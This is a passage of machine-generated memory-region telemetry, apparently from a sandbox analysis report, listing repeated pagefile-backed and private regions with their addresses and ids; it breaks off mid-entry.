filename = "" Region: id = 8732 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8733 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8734 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8735 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8736 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8737 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8738 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8739 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8740 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8741 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8742 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8743 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8744 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8745 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8746 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8747 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8748 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8749 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8750 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8751 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8752 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8753 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8754 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8755 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8756 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8757 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8758 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8759 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8760 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8761 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8931 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 8932 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 8933 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 8934 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 8935 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8936 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8937 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8938 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8939 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8940 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8941 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8942 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8943 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8944 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8945 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8946 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8947 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8948 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8949 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8950 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8951 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8952 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8953 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8954 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8955 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 8956 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9013 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9014 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9015 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9016 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9017 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9018 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9019 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9020 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9021 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9022 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9023 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9024 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9025 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9026 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9027 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9028 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9029 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9030 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9031 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9032 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9033 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9034 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9042 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9043 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9044 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9045 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9046 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9047 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9048 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9049 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9050 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9051 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9052 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9053 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9054 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9059 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9060 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9061 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9062 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9063 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9064 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9065 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9066 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9067 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9068 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9069 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9070 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9071 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9072 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9073 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9074 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9075 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9076 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9077 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9078 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9080 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9081 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9082 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9083 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9084 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9085 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9086 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9087 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9088 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9089 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9093 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9094 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9095 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9096 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9097 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9098 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9099 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9180 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9181 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9182 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9183 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9184 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9185 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9186 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9187 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9188 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9189 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9190 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9191 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9192 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9193 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9194 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9195 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9196 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9197 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9198 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9199 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9200 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9201 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9202 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9203 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9204 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9205 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9206 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9207 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9208 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9209 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9210 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9211 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9212 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9213 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9214 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9215 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9216 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9217 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9218 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9219 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9220 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9221 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9222 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9223 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9224 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9225 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9226 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9227 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9228 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9229 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9230 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9231 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9232 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9233 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9234 start_va = 0x2b0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9235 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9236 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9237 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9238 start_va = 0x2a0000 end_va = 